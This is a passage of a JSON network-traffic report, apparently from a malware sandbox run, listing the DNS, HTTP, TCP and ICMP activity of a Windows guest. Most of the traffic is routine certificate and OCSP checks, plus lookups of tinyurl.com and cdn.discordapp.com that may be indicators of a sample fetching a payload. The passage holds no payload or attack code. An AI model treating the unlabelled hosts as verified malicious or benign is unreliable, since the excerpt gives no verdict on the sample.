"data":"GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca4.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"www.download.windowsupdate.com",
"version":"1.1",
"path":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"data":"GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\\r\\nCache-Control: max-age = 3600\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nIf-Modified-Since: Mon, 12 Oct 2020 21:55:08 GMT\\r\\nIf-None-Match: \"069559e2a0d61:0\"\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.download.windowsupdate.com\\r\\n\\r\\n",
"port":80
},
{
"count":2,
"body":"",
"uri":"http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"www.microsoft.com",
"version":"1.1",
"path":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"data":"GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.microsoft.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.digicert.com",
"version":"1.1",
"path":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"data":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.digicert.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.comodoca4.com",
"version":"1.1",
"path":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"data":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca4.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"www.download.windowsupdate.com",
"version":"1.1",
"path":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"data":"GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\\r\\nCache-Control: max-age = 86402\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nIf-Modified-Since: Wed, 18 Jul 2018 21:12:37 GMT\\r\\nIf-None-Match: \"809093ddc1ed41:0\"\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.download.windowsupdate.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.comodoca.com",
"version":"1.1",
"path":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"data":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.digicert.com",
"version":"1.1",
"path":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"data":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.digicert.com\\r\\n\\r\\n",
"port":80
},
{
"count":1,
"body":"",
"uri":"http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"crl.comodoca4.com",
"version":"1.1",
"path":"/COMODORSADomainValidationSecureServerCA2.crl",
"data":"GET /COMODORSADomainValidationSecureServerCA2.crl HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: crl.comodoca4.com\\r\\n\\r\\n",
"port":80
}
],
"icmp":[
{
"src":"192.168.56.104",
"dst":"192.168.56.101",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"type":3,
"data":""
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.103",
"type":3,
"data":""
},
{
"src":"192.168.56.103",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.106",
"type":3,
"data":""
},
{
"src":"192.168.56.105",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"192.168.56.104",
"dst":"192.168.56.105",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
},
{
"src":"198.167.192.0",
"dst":"192.168.56.104",
"type":3,
"data":""
}
],
"smtp":[
],
"tcp":[
{
"src":"192.168.56.104",
"dst":"104.20.139.65",
"offset":5182,
"time":13.690144062042236,
"dport":443,
"sport":49175
},
{
"src":"192.168.56.104",
"dst":"151.139.128.14",
"offset":12630,
"time":52.40031313896179,
"dport":80,
"sport":49193
},
{
"src":"192.168.56.104",
"dst":"151.139.128.14",
"offset":14363,
"time":57.678099155426025,
"dport":80,
"sport":49202
},
{
"src":"192.168.56.104",
"dst":"151.139.128.14",
"offset":17791,
"time":65.10849809646606,
"dport":80,
"sport":49203
},
{
"src":"192.168.56.104",
"dst":"162.159.130.233",
"offset":19858,
"time":24.90461015701294,
"dport":443,
"sport":49179
},
{
"src":"192.168.56.104",
"dst":"184.28.22.50",
"offset":26887,
"time":30.370604038238525,
"dport":80,
"sport":49180
},
{
"src":"192.168.56.104",
"dst":"23.34.174.14",
"offset":133705,
"time":36.14260220527649,
"dport":80,
"sport":49190
},
{
"src":"192.168.56.104",
"dst":"23.34.174.14",
"offset":136426,
"time":41.636099100112915,
"dport":80,
"sport":49191
},
{
"src":"192.168.56.104",
"dst":"52.109.12.21",
"offset":140412,
"time":16.762935161590576,
"dport":443,
"sport":49176
},
{
"src":"192.168.56.104",
"dst":"52.109.12.21",
"offset":146787,
"time":68.29252910614014,
"dport":443,
"sport":49206
},
{
"src":"192.168.56.104",
"dst":"52.109.12.21",
"offset":153245,
"time":80.38848304748535,
"dport":443,
"sport":49219
},
{
"src":"192.168.56.104",
"dst":"52.109.76.32",
"offset":162933,
"time":19.923838138580322,
"dport":443,
"sport":49178
},
{
"src":"192.168.56.104",
"dst":"52.109.76.68",
"offset":178048,
"time":13.587248086929321,
"dport":443,
"sport":49174
},
{
"src":"192.168.56.104",
"dst":"93.184.220.29",
"offset":215161,
"time":19.0328152179718,
"dport":80,
"sport":49177
}
],
"smtp_ex":[
],
"mitm":[
],
"hosts":[
{
"country_name":"",
"ip":"104.20.139.65",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"151.139.128.14",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"162.159.130.233",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"184.28.22.50",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"23.34.174.14",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"52.109.12.21",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"52.109.76.32",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"52.109.76.68",
"inaddrarpa":"",
"hostname":""
},
{
"country_name":"",
"ip":"93.184.220.29",
"inaddrarpa":"",
"hostname":""
}
],
"pcap_sha256":"2d858a0c0c6c29ee51aed05936edfd5d623624e763b92a918904cfe7c69a097f",
"dns":[
{
"type":"A",
"request":"ocsp.comodoca.com",
"answers":[
{
"data":"151.139.128.14",
"type":"A"
}
]
},
{
"type":"A",
"request":"ocsp.comodoca4.com",
"answers":[
{
"data":"151.139.128.14",
"type":"A"
}
]
},
{
"type":"A",
"request":"www.download.windowsupdate.com",
"answers":[
{
"data":"184.28.22.24",
"type":"A"
},
{
"data":"184.28.22.50",
"type":"A"
},
{
"data":"2-01-3cf7-0009.cdx.cedexis.net",
"type":"CNAME"
},
{
"data":"download.windowsupdate.com.edgesuite.net",
"type":"CNAME"
},
{
"data":"a767.dspw65.akamai.net",
"type":"CNAME"
},
{
"data":"wu-fg-shim.trafficmanager.net",
"type":"CNAME"
}
]
},
{
"type":"A",
"request":"nexus.officeapps.live.com",
"answers":[
{
"data":"prod-w.nexus.live.com.akadns.net",
"type":"CNAME"
},
{
"data":"52.109.12.21",
"type":"A"
}
]
},
{
"type":"A",
"request":"nexusrules.officeapps.live.com",
"answers":[
{
"data":"52.109.76.32",
"type":"A"
},
{
"data":"prod.nexusrules.live.com.akadns.net",
"type":"CNAME"
}
]
},
{
"type":"A",
"request":"tinyurl.com",
"answers":[
{
"data":"172.67.1.225",
"type":"A"
},
{
"data":"104.20.139.65",
"type":"A"
},
{
"data":"104.20.138.65",
"type":"A"
}
]
},
{
"type":"A",
"request":"crl.comodoca4.com",
"answers":[
{
"data":"w3z5q8a6.stackpathcdn.com",
"type":"CNAME"
},
{
"data":"151.139.128.14",
"type":"A"
}
]
},
{
"type":"A",
"request":"officeclient.microsoft.com",
"answers":[
{
"data":"52.109.76.68",
"type":"A"
},
{
"data":"europe.configsvc1.live.com.akadns.net",
"type":"CNAME"
},
{
"data":"config.officeapps.live.com",
"type":"CNAME"
},
{
"data":"prod.configsvc1.live.com.akadns.net",
"type":"CNAME"
}
]
},
{
"type":"A",
"request":"www.microsoft.com",
"answers":[
{
"data":"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net",
"type":"CNAME"
},
{
"data":"23.34.174.14",
"type":"A"
},
{
"data":"e13678.dspb.akamaiedge.net",
"type":"CNAME"
},
{
"data":"www.microsoft.com-c-3.edgekey.net",
"type":"CNAME"
}
]
},
{
"type":"A",
"request":"ocsp.digicert.com",
"answers":[
{
"data":"93.184.220.29",
"type":"A"
},
{
"data":"cs9.wac.phicdn.net",
"type":"CNAME"
}
]
},
{
"type":"A",
"request":"cdn.discordapp.com",
"answers":[
{
"data":"162.159.135.233",
"type":"A"
},
{
"data":"162.159.134.233",
"type":"A"
},
{
"data":"162.159.129.233",
"type":"A"
},
{
"data":"162.159.130.233",
"type":"A"
},
{
"data":"162.159.133.233",
"type":"A"
}
]
}
],
"http_ex":[
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/fc97243298b707832b6ab33bb3f9b03c6639677a",
"sha1":"fc97243298b707832b6ab33bb3f9b03c6639677a",
"md5":"3ff6bafe5cfef14ff0f714bfef10b7df"
},
"sha1":"fc97243298b707832b6ab33bb3f9b03c6639677a",
"protocol":"http",
"dst":"93.184.220.29",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.digicert.com",
"uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"response":"HTTP/1.1 200 OK\\r\\nAccept-Ranges: bytes\\r\\nAge: 6357\\r\\nCache-Control: max-age=160276\\r\\nContent-Type: application/ocsp-response\\r\\nDate: Wed, 09 Dec 2020 14:53:40 GMT\\r\\nEtag: \"5fd09b33-5e3\"\\r\\nExpires: Fri, 11 Dec 2020 11:24:56 GMT\\r\\nLast-Modified: Wed, 09 Dec 2020 09:38:59 GMT\\r\\nServer: ECS (ska/F712)\\r\\nX-Cache: HIT\\r\\nContent-Length: 1507",
"host":"ocsp.digicert.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/fc97243298b707832b6ab33bb3f9b03c6639677a",
"sport":49177,
"method":"GET",
"md5":"3ff6bafe5cfef14ff0f714bfef10b7df"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/d0abec08c86825384ba8796671ab3c1a3f8451d5",
"sha1":"d0abec08c86825384ba8796671ab3c1a3f8451d5",
"md5":"0c8a5e90c5550012e029d0d4dd75c953"
},
"sha1":"d0abec08c86825384ba8796671ab3c1a3f8451d5",
"protocol":"http",
"dst":"93.184.220.29",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.digicert.com",
"uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"response":"HTTP/1.1 200 OK\\r\\nAccept-Ranges: bytes\\r\\nCache-Control: max-age=133395\\r\\nContent-Type: application/ocsp-response\\r\\nDate: Wed, 09 Dec 2020 14:53:45 GMT\\r\\nEtag: \"5fd04b0c-1d7\"\\r\\nExpires: Fri, 11 Dec 2020 03:57:00 GMT\\r\\nLast-Modified: Wed, 09 Dec 2020 03:57:00 GMT\\r\\nServer: nginx\\r\\nX-Cache: HIT\\r\\nContent-Length: 471",
"host":"ocsp.digicert.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/d0abec08c86825384ba8796671ab3c1a3f8451d5",
"sport":49177,
"method":"GET",
"md5":"0c8a5e90c5550012e029d0d4dd75c953"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/ec0885660bd216d0cdd5e6762b2f595376995bd0",
"sha1":"ec0885660bd216d0cdd5e6762b2f595376995bd0",
"md5":"e4f1e21910443409e81e5b55dc8de774"
},
"sha1":"ec0885660bd216d0cdd5e6762b2f595376995bd0",
"protocol":"http",
"dst":"184.28.22.50",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\\r\\nCache-Control: max-age = 86402\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nIf-Modified-Since: Wed, 18 Jul 2018 21:12:37 GMT\\r\\nIf-None-Match: \"809093ddc1ed41:0\"\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.download.windowsupdate.com",
"uri":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"response":"HTTP/1.1 200 OK\\r\\nCache-Control: public,max-age=3600\\r\\nContent-Type: application/vnd.ms-cab-compressed\\r\\nLast-Modified: Mon, 12 Oct 2020 21:55:08 GMT\\r\\nAccept-Ranges: bytes\\r\\nETag: \"069559e2a0d61:0\"\\r\\nServer: Microsoft-IIS/10.0\\r\\nX-Powered-By: ASP.NET\\r\\nContent-Length: 58936\\r\\nDate: Wed, 09 Dec 2020 14:53:51 GMT\\r\\nConnection: keep-alive\\r\\nX-CCC: US\\r\\nX-CID: 2",
"host":"www.download.windowsupdate.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/ec0885660bd216d0cdd5e6762b2f595376995bd0",
"sport":49180,
"method":"GET",
"md5":"e4f1e21910443409e81e5b55dc8de774"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/3b1efd3a66ea28b16697394703a72ca340a05bd5",
"sha1":"3b1efd3a66ea28b16697394703a72ca340a05bd5",
"md5":"a266bb7dcc38a562631361bbf61dd11b"
},
"sha1":"3b1efd3a66ea28b16697394703a72ca340a05bd5",
"protocol":"http",
"dst":"23.34.174.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.microsoft.com",
"uri":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"response":"HTTP/1.1 200 OK\\r\\nContent-Length: 1521\\r\\nContent-Type: application/octet-stream\\r\\nContent-MD5: oma7fcw4pWJjE2G79h3RGw==\\r\\nLast-Modified: Thu, 02 Aug 2018 21:11:46 GMT\\r\\nETag: 0x8D5F8BC8E631BB8\\r\\nx-ms-request-id: 82f157da-101e-00c0-80bd-dacd34000000\\r\\nx-ms-version: 2009-09-19\\r\\nx-ms-lease-status: unlocked\\r\\nx-ms-blob-type: BlockBlob\\r\\nX-EdgeConnect-Origin-MEX-Latency: 105\\r\\nDate: Wed, 09 Dec 2020 14:53:57 GMT\\r\\nConnection: keep-alive\\r\\nTLS_version: UNKNOWN\\r\\nX-RTag: RT",
"host":"www.microsoft.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/3b1efd3a66ea28b16697394703a72ca340a05bd5",
"sport":49190,
"method":"GET",
"md5":"a266bb7dcc38a562631361bbf61dd11b"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/3b1efd3a66ea28b16697394703a72ca340a05bd5",
"sha1":"3b1efd3a66ea28b16697394703a72ca340a05bd5",
"md5":"a266bb7dcc38a562631361bbf61dd11b"
},
"sha1":"3b1efd3a66ea28b16697394703a72ca340a05bd5",
"protocol":"http",
"dst":"23.34.174.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.microsoft.com",
"uri":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"response":"HTTP/1.1 200 OK\\r\\nContent-Length: 1521\\r\\nContent-Type: application/octet-stream\\r\\nContent-MD5: oma7fcw4pWJjE2G79h3RGw==\\r\\nLast-Modified: Thu, 02 Aug 2018 21:11:46 GMT\\r\\nETag: 0x8D5F8BC8E631BB8\\r\\nx-ms-request-id: 82f157da-101e-00c0-80bd-dacd34000000\\r\\nx-ms-version: 2009-09-19\\r\\nx-ms-lease-status: unlocked\\r\\nx-ms-blob-type: BlockBlob\\r\\nDate: Wed, 09 Dec 2020 14:54:02 GMT\\r\\nConnection: keep-alive\\r\\nTLS_version: UNKNOWN\\r\\nX-RTag: RT",
"host":"www.microsoft.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/3b1efd3a66ea28b16697394703a72ca340a05bd5",
"sport":49191,
"method":"GET",
"md5":"a266bb7dcc38a562631361bbf61dd11b"
},
{
"status":304,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"protocol":"http",
"dst":"184.28.22.50",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\\r\\nCache-Control: max-age = 3600\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nIf-Modified-Since: Mon, 12 Oct 2020 21:55:08 GMT\\r\\nIf-None-Match: \"069559e2a0d61:0\"\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: www.download.windowsupdate.com",
"uri":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"response":"HTTP/1.1 304 Not Modified\\r\\nContent-Type: application/vnd.ms-cab-compressed\\r\\nLast-Modified: Mon, 12 Oct 2020 21:55:08 GMT\\r\\nETag: \"069559e2a0d61:0\"\\r\\nCache-Control: public,max-age=3600\\r\\nDate: Wed, 09 Dec 2020 14:54:08 GMT\\r\\nConnection: keep-alive\\r\\nX-CCC: US\\r\\nX-CID: 2",
"host":"www.download.windowsupdate.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sport":49180,
"method":"GET",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/23bd08d4ab901cfb500d23fcb644439e70d79bd3",
"sha1":"23bd08d4ab901cfb500d23fcb644439e70d79bd3",
"md5":"0cd6bd94d6b30576670228449983dd79"
},
"sha1":"23bd08d4ab901cfb500d23fcb644439e70d79bd3",
"protocol":"http",
"dst":"151.139.128.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca.com",
"uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"response":"HTTP/1.1 200 OK\\r\\nDate: Wed, 09 Dec 2020 14:54:13 GMT\\r\\nContent-Type: application/ocsp-response\\r\\nLast-Modified: Wed, 09 Dec 2020 00:48:24 GMT\\r\\nAccept-Ranges: bytes\\r\\nServer: Apache\\r\\nETag: 23BD08D4AB901CFB500D23FCB644439E70D79BD3\\r\\nCache-Control: max-age=554600,s-maxage=1800,public,no-transform,must-revalidate\\r\\nX-OCSP-Responder-ID: mcdpcaocsp4\\r\\nX-HW: 1607525653.cds042.sk1.h2,1607525653.cds228.sk1.c\\r\\nConnection: keep-alive\\r\\nContent-Length: 471",
"host":"ocsp.comodoca.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/23bd08d4ab901cfb500d23fcb644439e70d79bd3",
"sport":49193,
"method":"GET",
"md5":"0cd6bd94d6b30576670228449983dd79"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/a2e1e7a1b5c21b0c07b99b6db8ba4c7c837f88e4",
"sha1":"a2e1e7a1b5c21b0c07b99b6db8ba4c7c837f88e4",
"md5":"3089d8b262d86243ac8c1fef010f0b13"
},
"sha1":"a2e1e7a1b5c21b0c07b99b6db8ba4c7c837f88e4",
"protocol":"http",
"dst":"151.139.128.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
